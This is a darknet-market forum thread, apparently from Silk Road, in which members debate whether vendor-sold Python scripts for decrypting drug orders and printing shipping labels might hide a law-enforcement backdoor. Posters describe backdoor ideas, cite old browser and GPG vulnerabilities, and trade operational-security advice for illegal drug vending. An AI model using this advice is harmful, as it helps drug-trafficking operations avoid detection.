4) The vendor opens the original spreadsheet in no. 2 and does the same thing for unencrypted data, saved as clearorders.csv.
5) The vendor runs the first script which reads the CSV and saves separate files named according to the buyer's username, the transaction number and writes the content of the address field to that text file. It then invokes GPG (gpg --decrypt-files *.asc) to decrypt the encrypted data.
6) The vendor then runs the second script to review *.txt and make sure those files only contain names and addresses for printing.
7) The next major piece of code rewrites all of those addresses as basic HTML. That HTML is then converted to PDF using a third party program which needs to be installed (HTMLDOC, which is released under GPLv2 and is available at www.htmldoc.org).
8) Then the labels/envelopes are printed.
Currently the Python code uses the csv module and basic Python functions, mainly involving lists, reading files and writing new files.
I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.
And again, for emphasis, it doesn't matter if pine cannot figure out where the exploit is hiding. The fact remains that you've made an incredibly incriminating move on these forums. One that would have been blatantly obvious to any IT security professional, and since you have such expertise, you cannot then go and claim ignorance.
The LE accusation only holds true if the code can somehow report on users, which it doesn't.
We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.
It can quite easily run on a completely disconnected system. It makes no difference to the program.
Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.
Pine, this is the second time you've accused me of being LE based on a misunderstanding of software. The first time was not understanding how GPG verifies signatures. You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.
I did not accuse you of being a LE agent before. I merely stated I had to validate your claims that GPG worked the way you said it did. That was possible in that instance.
In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphere Software Apologists are going to make that go away.
Gladly. Got any other questions I haven't addressed already?
^ Try explaining how 3 different attacks can be addressed using available evidence without us auditing the software on this forum.
A: Simple Bait 'n Switch.
B: Whitespace/character adjustment/replacment to communicate invisible data via the vendors themselves.
C: Software dependency backdoors.
And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact. This is not a court of law, we don't have innocent until proven guilty here. Again, not relying on human trust is the lynchpin of the darknet markets. Everybody is potentially LE agents, some more so than other, since they intend to upload non-audited software anonymously tor big drug dealers online and expect nobody will have a qualm about how sketchy that looks.
-
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Exactly! Also, I figured that using any other license wouldn't matter if others who receive the code release it anyway, so I selected a license that guarantees other changes be able to be released.
I didn't choose the GPL Affero v3 because that would require publicly releasing every version, including customised ones for specific clients. For example, the version currently available is version 1.1, but version 1.0 doesn't have the code for handling plain text orders only because the vendor who initially contacted me cancels unencrypted orders.
Obviously the GPLv3 does not prevent selling code released under that license. Without going into specifics, I've discussed this with RMS face-to-face, but all this can be confirmed from the Free Software Foundation.
The GPLv3 simply grants certain rights to users and the obligation that the source be made available with the distribution. Since the distribution *is* the source code (Python executables are great like that), then that obligation is covered.
What a complete red herring this is. It wouldn't matter if Linus Torvalds and Bill Gates both signed off on the deal :D
I admit I didn't notice what particular "license" was being used. And it doesn't matter one fucking jot because source doesn't need be closed in order to contain or be connected to some exploit. It just needs not enough people to be observant enough to catch it in time. That's all it requires. Surely people don't expect that LouisCyphre expected us to be having this discussion...? In his view, a bunch of vendors should have just run his half a dozen or so files without a single quibble.
is it even possible to make python programs closed source? What is it, bytecode?
No, it's just .py and .sh scripts which are executable. The closed source claim is a red herring to back up the LE false assumption.
^because pine is le, been trying to tell you guys that.
You're welcome to your opinion, but please hold off on the accusations without proof.
Now you see it, now you don't. Interesting.
-
Open source. Licenses. Rules. WTF? We sell fucking drugs here. There are hacked websites and programs and stolen shit galore!
Why would anyone give a crap about proper code license?
I used to wear a sheep skin just to sneak up on those tasty little lambs.
-- The Wolf
(AKA Modzi)
-
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not. ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre. :)
I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only.
If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it.
Precisely. That coupled with the price point/target audience Louis set out in his advertisement would have, if successful, been installed on all the large vendors on here. How people cannot see the absurdity of this on a forum of international drug dealers I do not quite comprehend.
I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).
I am guilty of not using semantics appropriately here, nothing more. All the actual facts remain the same. This GPL thing is a distraction from those.
My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.
You see:
open source and the code is available for everyone here to audit
That is what I meant by open source. That the code was closed source because it could not be analyzed by everybody here independently.
Technically, yes, this is incorrect semantics, code can be open source but not still not viewable to the general public. Albeit I could argue that defies the spirit of what "open" is supposed to mean, but that's a discussion for a different day. If this were a normal forum, this would be for the birds. It is not, and so it is not.
Again, none of the above should have any bearing on this discussion because at *worst* Pine is guilty of being wrong about a technicality or even possibly not knowing a programming language, and at *best* Louis Cyphere is guilty of being exceptionally naive for a IT security conscious person and abusing the good reputation he's built up by encouraging others to adopt systems that must be insecure by default. And you know the worse case.
-
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated. Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC. I'm basing this opinion on what my experience with PGP Club and GPG instruction in other threads and via PMs.
And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.
There's nothing in the GPL which prevents selling the code under that license. In fact, here's the part of the FAQ which relates to it:
Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.
I can understand that concern too and I share it. There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.
It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.
It's possible to compile Python code as a Windows executable, but that's not what this is. I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb. Ridiculous. I'd rather just install Python, if it's not already installed, and run the code.
I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward. I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.
It is possible to make a windows executable out of a Ruby script as well, but it contains the actual script and a ruby interpreter inside of it ;). I have no real idea, but I wouldn't be surprised if it is the same thing with python. Yeah I also think it is pretty straight forward to reverse engineer bytecode, but I was trying to imagine what a close source python program would look like. I don't know Python but I do know Ruby and even the .exe's contain the source code in them, they are a cheap gimmick that packages an interpreter and the script into a single executable file.
-
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programers could be caught out if they are not trained to analyze potentially malicious code. Code analyis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.
It is much harder to hide something in a python script than in say C or C++ source code.
-
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If its clean and it works, we will see!
Unfortunately for us all it is not so simple, for the reasons I have posted in my responses, this won't show or prove anything at all.
I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern,
I can understand that concern too and I share it. There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.
Haha, wow, what a redirection. Nice try.
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage just those components cannot contain an exploit for you to worry about because it's not even programming code.
And if SR indeed did offer up it's server side code as open source, LE would surely be delighted to examine it for weaknesses.
You see, SR *may* use software as a base that is open source in of itself, but this does not imply you should make open source the specific way in which you're making use of the said open source software. It's apples and oranges. If this was a real war, it'd be like the difference between the enemy knowing you have tanks, and the enemy actually knowing the tank placements. Again, LouisCyphre surely already knows this.
-
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If its clean and it works, we will see!
now, IF he were LE, then he could release one version of the code into the wild to be audited, while selling another because it "includes support" there would be no way of knowing weather the code being audited is the same as the one being sold.
and I agree with kmf that anyone capable of auditing the code is equally capable of writing it, so the market for your "closed" (by pine's definition not having the source before running it) software if only the low hanging fruit, which is notoriously LE's favorite target.
I will now step away from this drama.
-
Quote from: LouisCyphre on Today at 12:06 AM
The LE accusation only holds true if the code can somehow report on users, which it doesn't.
We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.
OK I could help myself, but this kind of reminds me of the Mitt Romney tax return nonsense. take my word for it!
-
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.
Well you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program , especially if it is not severely restricted in what it is allowed to do on your system (such as javascript is). In short, going to an pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage just those components cannot contain an exploit for you to worry about because it's not even programming code.
It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well strictly speaking the php code doesn't but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browsers HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and vulnerabilities like this are few and far between, although it was not that long ago I remember reading about a html based exploit against firefox.
And if SR indeed did offer up it's server side code as open source, LE would surely be delighted to examine it for weaknesses.
And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much php experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with, for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apace is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling apache as one would benefit security or the hardware requirements to take full advantage of it etc.....
-
who knows, who cares.
if you want to download the program and get ass fucked for the next 60-life, then so be it.
if you want to enjoy buying and selling drugs over the internet for the next 60-life, then so be it.
LE or not LE.
FUCK IT.
/thumbs
-
just looked it up, seems Ubuntu does have apache compiled as position independent since version 9.04 so that is a big plus. Hopefully SR server has a 64 bit processor to take advantage of that.
-
I'll scond that!! Nothing has been said to prove that Cypher is anything of the kind. He is not the only vendor who provides "software", would you trust any of these products more or less:
http://silkroadvb5piz3r.onion/index.php/silkroad/item/b9eced345d
http://www.silkroadvb5piz3r.onion/index.php/silkroad/item/3e4be45be5
Fact is python code is not too hard to go through if you know some code. These facts aside I am not saying that any opf these products have backdoors or trojans in them. I sure as heck wouldnt trust a VM that someone sold me off of SR to do use to do anything illegal. According to Sands, Cypher's code was produced initially for vendor and does work.
Mr www.hiddenservice.onion you've got to be joking.
pardon my typo
"Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!
Your operational security, I would not pay for it with somebody else's money.
I think you misunderstood me Pine, I meant that of course it would be even easier for these VM's to hide trojan's and wouldn't use them EVER.
-
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.
Well you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program , especially if it is not severely restricted in what it is allowed to do on your system (such as javascript is). In short, going to an pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).
What are those serverside pieces of code that find their way into the clients main memory/HD? That's a bolt from the blue for pine. I thought something like that would essentially illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage just those components cannot contain an exploit for you to worry about because it's not even programming code.
It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well strictly speaking the php code doesn't but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browsers HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and vulnerabilities like this are few and far between, although it was not that long ago I remember reading about a html based exploit against firefox.
HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.
Anyway, this is not helping my already high paranoia levels today, so I'm not sure I should be asking you any more questions right now :D
And if SR indeed did offer up it's server side code as open source, LE would surely be delighted to examine it for weaknesses.
And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much php experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with, for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apace is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling apache as one would benefit security or the hardware requirements to take full advantage of it etc.....
[/quote]
Sure, I agree on general principals about auditing (but it's got to be seriously tricky to do it with a hidden service like SR), but it'd be wrong to just give it all to everybody at once when you're also running a live system based on that exact configuration/implementation. Which would imply you'd have to take SR down in order to audit it every so often when changes are necessary. All tricky stuff which could introduce more bugs, either accidentally or deliberately via malicious auditors.
-
LE or not LE.
Louis has a bad attitude.
if he is trying to better the community, more power.
if he is trying to belittle the community, less power.
:(
/thumbs
-
"Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!
Your operational security, I would not pay for it with somebody else's money.
I think you misunderstood me Pine, I meant that of course it would be even easier for these VM's to hide trojan's and wouldn't use them EVER.
Aha. Then we are agreed on that.
A general point I neglected to mention which may explain some of this situation:
People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.
-
"Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!
Your operational security, I would not pay for it with somebody else's money.
I think you misunderstood me Pine, I meant that of course it would be even easier for these VM's to hide trojan's and wouldn't use them EVER.
Aha. Then we are agreed on that.
A general point I neglected to mention which may explain some of this situation:
People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.
what better way to find out if we want it or not than to let us "have at it".
i think this was a VERY GOOD thread. the accusations of Louis being LE could be highly ludicrous, but they needed to be brought to the table.
we, the people of the Road, need to talk about it.
if the program can't be offered how we need it to be offered as far as being secure as possible, then we don't need it.
and if a vendor can't handle 10 orders then they need to:
A. hire more people.
B. quit.
C. cut your business by 50%.
D. come in here and call everyone else a COP.
haha.
/thumbs
-
I agree that this is a bad way to make money for louis and that he should probably just release it open source with a tip jar. I also don't know how many people would buy it either way or even if people would use such software if it was free so this whole thing strikes me as bizarre. It just doesn't make sense to me really but everyone could use some extra cash I guess. All in all I think louis just didn't think through how this might look to others.
Also, I know this is going to come out of left field but could you please stop with the platypus shit at least for this one thread. I don't know where in the internet that started but I know like 3 teen age girls who for some reason think that just saying(actually mostly just typing) the word platypus is fucking hilarious and it brings back nightmarish scenes of pointless and retarded references more terrible to behold than a bad trip on 4 ozs of shrooms everytime someone says the word platypus... OH THE HUMANITY!!
It's so fucking simple in the end: Unless louis releases the code then we can't trust the program and there really isn't anything to it but that in my opinion. So why the long ass posts etc? I mean it's like all of you live in derpaderpistan or something.
-
Good work looking out for the vendors pine, good contribution to the community. Anyone else who has the time to read around here should do their part too.
-
What are those serverside pieces of code that find their way into the clients main memory/HD? That's a bolt from the blue for pine. I thought something like that would essentially illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.
the php code stays on the server but the html files it generates do not. the stylesheets the generated may not. The images on it do not. etc. If you don't have javascript disabled javascript can run on your machine as well. A lot of remote code execution bugs with firefox are linked to font rendering actually. There have been vulnerabilities in the firefox html engine as well, I am not certain but I believe they could be carried out with html only. Actually a little research has made me certain, here is an example of a firefox vulnerability that could be exploited with a specially crafted href http://www.cvedetails.com/cve/CVE-2007-2671/ . It doesn't mention the possibility of remote code execution, only a crash and denial of service, but where there is crashing remote code execution is generally possible. So you are correct that the php code for SR does not run in your memory, but things from SR are indeed present in your computers memory and in some cases on its HD.
HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.
Firefoxes HTML engine can be exploited with HTML. Here is a link about gpg being remotely exploited during signature verification although it is not the example I was thinking of it is the first thing I found about GPG exploits while searching for it http://forums.gentoo.org/viewtopic-p-6848828.html and here is another example of specially crafted signed / encrypted data being used to pwn people who process it through GPG: http://lwn.net/Articles/212909/
-
just looked it up, seems Ubuntu does have apache compiled as position independent since version 9.04 so that is a big plus. Hopefully SR server has a 64 bit processor to take advantage of that.
Position independent..Is that the thing where programs get shoved around to random sections of memory?
Open source. Licenses. Rules. WTF? We sell fucking drugs here. There are hacked websites and programs and stolen shit galore!
I think what's going on here is that a lot of people who should know better, get gradually lulled into a false sense of security with the relative normality of using an Ebay like e-commence site to buy illegal drugs. In the eyes of the law in most places, this makes you a criminal no matter how the contraband was obtained. It isn't different, it just seems even more stupid that transactions like these are illegal and this sometimes makes people relax for, perhaps thinking that because this feels more normal, legalization is around the corner. Perhaps that is so, but it is still so that the DEA want to throw you in prison right now regardless of what happens in the future!
--
Somebody mentioned here (but it disappeared)
When the auditors are happy that the code is not malicious, they could sign the archive with their PGP keys. The signature file would be distributed on a part of the site that the vendor doesn't control. Buyers could check the downloaded archive against the signature.
...That LouisCyphre could have obtained auditing, got the auditors to then sign the package as legitimate, and you'd be able to check if the package had changed in the same way you verify a PGP signature or SHA-1 hash when you download a program from the developers. Seems to me that's a reasonable question.
I mean it's not perfect as a solution, total open source is better still, but at least it would have begun to address vendor concerns about their operational security. That is why I have trouble believing LouisCyphre acted out of naivety, we have been talking to him about security and little else for months now, it's hard to believe this is something he'd overlook, something he wouldn't even address explicitly as an issue. Selling software to big drug dealers and not expecting that any checks might be necessary. You don't *need* to be paranoid to find that hugely weird. That's why I came to the conclusion I did. The shoe fits.
-
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....
-
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....
lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think its kind of been forgotten that Louis created this out of request by another vendor... why doesnt someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffick mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.
-
Louis is a smart smart smart smart entity.(from what i can tell.)
i really just don't think he could be LE.. but wouldn't the best fit in the painting without being noticed? (where's waldo effect.)
well played, DEA, well played.
haha..
sorry. i love everyone. no offense aimed at anyone.
no harm no foul.
/thumbs
-
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....
lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think its kind of been forgotten that Louis created this out of request by another vendor... why doesnt someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffick mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.
Do you have ADD and are incapable of following the discussion here? I find all of these diversion type comments to be pretty sketchy. None of this thread has anything to do with LE vendors shipping drugs, although it is extremely naive to think that law enforcement can not sell drugs that end up being used by people. If this were the case there would be no such thing as an undercover investigation, the organization being infiltrated could merely require that the agent be observed dealing drugs to users and then monitor if any of them are busted or not. If LE could not sell drugs that are then used, they could not do undercover operations. But all of that is completely irrelevant to the topic at hand here. You clearly are incapable of understanding the sort of attack we are talking about or really anything that is going on in this thread.
-
Think what you will, but you can always use his software on a machine thats not connected to the net.
Of course. All vendors use physical Air Gaps by burning information from the Internet on read only CD/DVDs, decrypt on the isolated machine, and then in order to communicate back across the Air Gap they use either the keyboard to transfer information across to the networked machine using their eyeballs, or else they utilize something like a checksum to ensure the information coming back on a read only CD/DVD is precisely what was intended to come back across. This will mean manually adding up and knowing the exact data.
Because that's pretty much the only way what you said would work, could work. Otherwise it just doesn't. So what you said is essentially for practical purposes complete bullshit.
Given all the software does, you can do that.
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Yes. Because it's totally irrelevant so long as the code is not explicitly posted whereby it can be audited. For several reasons, four of which are:
A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.
Easily proven wrong with SHA256 checksums. Actually, there's a point, better go and add that for the individual files.
B: The exploit may not be in the actual software, ever. The malware could be in the related pieces of software you need to acquire to make it 'work'. e.g. HTMLDOCs. This was a exploit achieved by the Vietnamese Secret Service against Tor users a few years ago. People downloaded Tor and it was fine. But they needed to download a language set for Vietnamese for the windows operating system. Turned out the backdoor was in that language set they downloaded, and everybody who was reading Vietnamese on windows had become part of the Vietnamese Secret Service's botnet.
That's also how Anonymous got the kiddie fiddlers, by getting them to use an infected version of Tor Button.
As for HTMLDOC, you can examine its code. Alternatively you can skip it and just opt for printing plain text or even the HTML. I only included the HTML to PDF function because the vendor who originally contacted me wanted to print to envelopes and HTMLDOC allowed easy generation of a PDF which matched the layout of the template the vendor provided to me.
C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.
The code isn't that complex, I can step them through the essentials of what it does and then they can ask someone not connected to all of this whether I'm full of shit or not.
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programers could be caught out if they are not trained to analyze potentially malicious code. Code analyis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.
Don't expect an exploit to be straight forward. They are deliberately engineered to obfuscate the origin of the exploit. That is kind of the entire point of an exploit.
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.
-
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....
lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think its kind of been forgotten that Louis created this out of request by another vendor... why doesnt someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer. LE can't just traffick mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying... nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.
Do you have ADD and are incapable of following the discussion here? I find all of these diversion type comments to be pretty sketchy. None of this thread has anything to do with LE vendors shipping drugs, although it is extremely naive to think that law enforcement can not sell drugs that end up being used by people. If this were the case there would be no such thing as an undercover investigation, the organization being infiltrated could merely require that the agent be observed dealing drugs to users and then monitor if any of them are busted or not. If LE could not sell drugs that are then used, they could not do undercover operations. But all of that is completely irrelevant to the topic at hand here. You clearly are incapable of understanding the sort of attack we are talking about or really anything that is going on in this thread.
+1
-
Awesome! I'm no vendor but I want to buy this software and have a looksy inside it's guts!
-
*If* it were open source,
It is.
This is a technicality, you know exactly what I mean by it, it's not 'open' if it's not visible for auditing *before* anybody uses it.
Ah, so your definition is free as in speech and beer. Alright.
I'll tell you what, I'll speak to DPR about independently vetting it offline. Would that be good enough?
Louis, if DPR himself came down from the clouds in a blaze of heavenly glory on a magnificent green camel and said the code was legitimate but that we couldn't independently audit it, it still wouldn't count for much.
Okay.
This is because DPR's account could be compromised. Not to mention because even if DPR was posting (lest we forget Sabu) to say it was legitimate, it still doesn't prove anything. This is because we would trusting in somebody. We assume everybody here is a potential LE agent or could become one, that is why this system works. I know you know this, I'm just making a mini-tutorial on how darknet markets are supposed to operate for any others watching this thread who don't know.
Fine.
*if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work.
I reckon it can, that's why I'm bothering to do this.
Oh really? Tell me, how precisely is that supposed to work?
Well, not needing any kind of network connectivity is a good start. Seriously, all it does is turn order data from a HTML page into something that prints.
If you can show me how a computer connected only to a printer can mysteriously beam data to the agency of your choice, then I'll buy it.
Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software.
The market is certainly a niche one. Especially when it may not be worth it for smaller volume vendors.
I may come up with something for buyers later, but my focus is just this for now.
Uh huh. I bet.
